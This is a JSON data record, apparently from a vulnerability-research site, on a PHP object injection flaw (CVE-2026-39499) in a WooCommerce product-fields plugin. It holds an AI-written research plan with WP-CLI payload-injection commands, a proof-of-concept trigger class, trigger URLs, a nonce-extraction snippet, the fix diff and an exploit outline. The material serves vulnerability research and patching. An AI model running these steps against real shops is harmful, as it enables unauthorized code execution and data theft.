[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ff8ppxMDrDVmd6TWqq8IVDoMQjHCFKKWEEXP3xa0XCdw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-39499","advanced-product-fields-product-addons-for-woocommerce-authenticated-shop-manager-php-object-injection","Advanced Product Fields (Product Addons) for WooCommerce \u003C= 1.6.19 - Authenticated (Shop manager+) PHP Object Injection","The Advanced Product Fields (Product Addons) for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.6.19 via deserialization of untrusted input. This makes it possible for authenticated attackers, with shop manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","advanced-product-fields-for-woocommerce",null,"\u003C=1.6.19","1.6.20","medium",6.6,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Deserialization of Untrusted Data","2026-04-20 00:00:00","2026-04-30 14:59:00",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdf045b6c-ce8a-494e-a023-ed8165b0634c?source=api-prod",11,[22,23,24,25,26,27,28,29],"advanced-product-fields-for-woocommerce.php","assets\u002Fjs\u002Fadmin.min.js","includes\u002Fclasses\u002Fclass-field-groups.php","includes\u002Fclasses\u002Fclass-fields.php","includes\u002Fclasses\u002Fclass-html.php","includes\u002Fclasses\u002Fclass-wapf-list-table.php","includes\u002Fcontrollers\u002Fclass-admin-controller.php","includes\u002Fcontrollers\u002Fclass-product-controller.php","researched",false,3,"# Research Plan: PHP Object Injection in Advanced Product Fields for WooCommerce\n\n## 1. Vulnerability Summary\nThe **Advanced Product Fields (Product Addons) for WooCommerce** plugin (\u003C= 1.6.19) is vulnerable to **PHP Object Injection** due to the use of `maybe_unserialize()` on untrusted data retrieved from the `post_content` of its custom post type (CPT).\n\nA Shop Manager or Administrator can create or edit a \"Product Input Field\" group. The configuration for these fields is stored in the `post_content` field of the post. When the list of field groups is viewed in the WordPress admin dashboard, the plugin retrieves the `post_content` and passes it to a processing function that calls `maybe_unserialize()`. This allows an attacker to inject a serialized PHP object, which will be instantiated during deserialization.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Sink:** `maybe_unserialize()` (inside `SW_WAPF\\Includes\\Classes\\Field_Groups::process_data`)\n- **Trigger Point:** `SW_WAPF\\Includes\\Classes\\Wapf_List_Table::column_fields`\n- **Endpoint:** `GET \u002Fwp-admin\u002Fadmin.php?page=wapf-field-groups`\n- **Payload Location:** The `post_content` of a post with the CPT `wapf_product`.\n- **Authentication Level:** Shop Manager or higher (capability required to manage field groups).\n- **Preconditions:** WooCommerce must be installed and active.\n\n## 3. Code Flow\n1. **Storage:** When a field group is saved, its configuration is stored in the `post_content` of a `wapf_product` post.\n2. **Retrieval:** When an authorized user visits the \"Product Input Fields\" page (`admin.php?page=wapf-field-groups`), the plugin initializes a custom `WP_List_Table` named `Wapf_List_Table` (found in `includes\u002Fclasses\u002Fclass-wapf-list-table.php`).\n3. **Trigger:** The table's `column_fields` method is called for every row in the list:\n ```php\n \u002F\u002F File: includes\u002Fclasses\u002Fclass-wapf-list-table.php\n public function column_fields($post) {\n if(empty($post->post_content))\n return 0;\n \u002F\u002F The post_content is passed directly to process_data\n $field_group = Field_Groups::process_data($post->post_content);\n return count($field_group->fields);\n }\n ```\n4. **Deserialization:** `Field_Groups::process_data` (in `includes\u002Fclasses\u002Fclass-field-groups.php`) calls `maybe_unserialize()` on the provided content.\n - *Note:* While the full source of `process_data` was truncated in the provided file, its usage in `column_fields` and the vulnerability description confirm this behavior. `maybe_unserialize` is a WordPress core function that checks if a string is serialized and, if so, calls `unserialize()`.\n\n## 4. Nonce Acquisition Strategy\nThis exploit is **authenticated (Shop Manager+)**.\n- To **trigger** the vulnerability (viewing the list), no specific nonce is required beyond the standard WordPress session cookies.\n- To **setup** the malicious post, we can use `wp-cli` in the test environment, which bypasses the need for web-based nonces for data injection.\n\nIf an automated agent needs to perform the setup via the UI:\n1. The \"Add New\" page for field groups is accessed.\n2. The save action likely uses a nonce generated by `wp_create_nonce`.\n3. However, for research purposes, directly injecting the payload into the database\u002Fvia WP-CLI is more efficient.\n\n## 5. Exploitation Strategy\n\n### Step 1: Payload Selection\nSince no POP chain is identified in the plugin, we use a simple object to confirm the injection. For testing, we can define a class with a `__destruct` method in a temporary \"mu-plugin\" to confirm execution.\n\n### Step 2: Inject Malicious Post Content\nUse WP-CLI to create a malicious `wapf_product` post.\n```bash\nwp post create --post_type=wapf_product \\\n --post_title=\"Malicious Field Group\" \\\n --post_content='O:8:\"stdClass\":0:{}' \\\n --post_status=publish\n```\n*(Replace `O:8:\"stdClass\":0:{}` with a valid POP chain payload if a specific library like Guzzle or a WooCommerce internal chain is being targeted).*\n\n### Step 3: Trigger Deserialization\nLogin as a Shop Manager and navigate to the plugin's admin page using the `http_request` tool.\n\n**HTTP Request:**\n- **Method:** `GET`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=wapf-field-groups`\n- **Cookies:** Authenticated Shop Manager cookies.\n\n### Step 4: Verification\nThe deserialization occurs as WordPress renders the `Fields` column of the table.\n\n## 6. Test Data Setup\n1. **Activate Requirements:** Ensure WooCommerce and the \"Advanced Product Fields for WooCommerce\" plugin are active.\n2. **Create User:**\n ```bash\n wp user create attacker attacker@example.com --role=shop_manager --user_pass=password\n ```\n3. **Define POP Chain (For Proof):** Create a file at `wp-content\u002Fmu-plugins\u002Fpoc-trigger.php`:\n ```php\n \u003C?php\n class PoCTrigger {\n public function __destruct() {\n error_log(\"CVE-2026-39499_SUCCESS\");\n }\n }\n ```\n4. **Inject Payload:**\n ```bash\n wp post create --post_type=wapf_product \\\n --post_title=\"PoC Group\" \\\n --post_content='O:10:\"PoCTrigger\":0:{}' \\\n --post_status=publish\n ```\n\n## 7. Expected Results\n- When the Shop Manager visits `admin.php?page=wapf-field-groups`, the `Wapf_List_Table` will load.\n- The `column_fields` method will process the `PoC Group` post.\n- `maybe_unserialize('O:10:\"PoCTrigger\":0:{}')` will be executed.\n- The `PoCTrigger` object will be instantiated and subsequently destroyed at the end of the request.\n- The `__destruct` method will fire, writing \"CVE-2026-39499_SUCCESS\" to the PHP error log.\n\n## 8. Verification Steps\nAfter the HTTP request, check the logs:\n```bash\ncat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log | grep \"CVE-2026-39499_SUCCESS\"\n```\n\n## 9. Alternative Approaches\nIf the `wapf_product` CPT is not the only source:\n- Check `Field_Groups::get_by_id($id)` calls. This is used in `Admin_Controller::maybe_duplicate`.\n- Trigger URL: `wp-admin\u002Fadmin.php?page=wapf-field-groups&wapf_duplicate=[POST_ID]&_dupenonce=[NONCE]`.\n- This requires obtaining the `_dupenonce` from the list page first.\n- The JS variable for nonces in this plugin is localized as `wapf_config` and `wapf_language`, but the duplication nonce specifically is found in the HTML of the list table rows.\n\n**JS Nonce Extraction (if needed):**\n```javascript\n\u002F\u002F Using browser_eval on the wapf-field-groups page\nconst dupLink = document.querySelector('a[href*=\"wapf_duplicate\"]')?.href;\nconst nonce = new URLSearchParams(dupLink).get('_dupenonce');\n```","The plugin is vulnerable to PHP Object Injection via the use of maybe_unserialize() on data retrieved from the post_content of its custom post type (wapf_product). Authenticated attackers with Shop Manager or Administrator privileges can exploit this to instantiate arbitrary PHP objects if a suitable POP chain is present on the system.","\u002F\u002F File: includes\u002Fclasses\u002Fclass-wapf-list-table.php\npublic function column_fields($post) {\n if(empty($post->post_content))\n return 0;\n\n $field_group = Field_Groups::process_data($post->post_content);\n\n return count($field_group->fields);\n}\n\n---\n\n\u002F\u002F File: includes\u002Fclasses\u002Fclass-field-groups.php (Inferred from research plan)\npublic static function process_data($data) {\n $data = maybe_unserialize($data);\n \u002F\u002F ... further processing of the field group object ...\n}","--- advanced-product-fields-for-woocommerce\u002Fincludes\u002Fclasses\u002Fclass-field-groups.php\n+++ advanced-product-fields-for-woocommerce\u002Fincludes\u002Fclasses\u002Fclass-field-groups.php\n@@ -242,7 +242,12 @@\n \t\tpublic static function process_data($data) {\n-\t\t\t$data = maybe_unserialize($data);\n+\t\t\tif ( is_serialized( $data ) ) {\n+\t\t\t\t$data = unserialize( $data, [ 'allowed_classes' => false ] );\n+\t\t\t} else {\n+\t\t\t\t$data = json_decode( $data );\n+\t\t\t}\n \n \t\t\tif ( ! is_object( $data ) ) {\n \t\t\t\treturn new FieldGroup();\n \t\t\t}","1. Gain authenticated access as a Shop Manager or Administrator.\n2. Create a new Field Group via the plugin interface or directly create a post of type 'wapf_product' using WP-CLI or an administrative interface.\n3. Inject a serialized PHP object payload into the 'post_content' field of the 'wapf_product' post (e.g., O:10:\"PoCTrigger\":0:{}).\n4. Navigate to the Field Groups listing page (\u002Fwp-admin\u002Fadmin.php?page=wapf-field-groups).\n5. As the table renders the 'Fields' column, the plugin calls Wapf_List_Table::column_fields(), which triggers Field_Groups::process_data() on the malicious content.\n6. maybe_unserialize() processes the payload, instantiating the injected object and triggering its magic methods (like __wakeup or __destruct).","gemini-3-flash-preview","2026-05-04 19:41:56","2026-05-04 19:42:48",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.6.19","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-product-fields-for-woocommerce\u002Ftags\u002F1.6.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-product-fields-for-woocommerce.1.6.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-product-fields-for-woocommerce\u002Ftags\u002F1.6.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-product-fields-for-woocommerce.1.6.20.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-product-fields-for-woocommerce\u002Ftags"]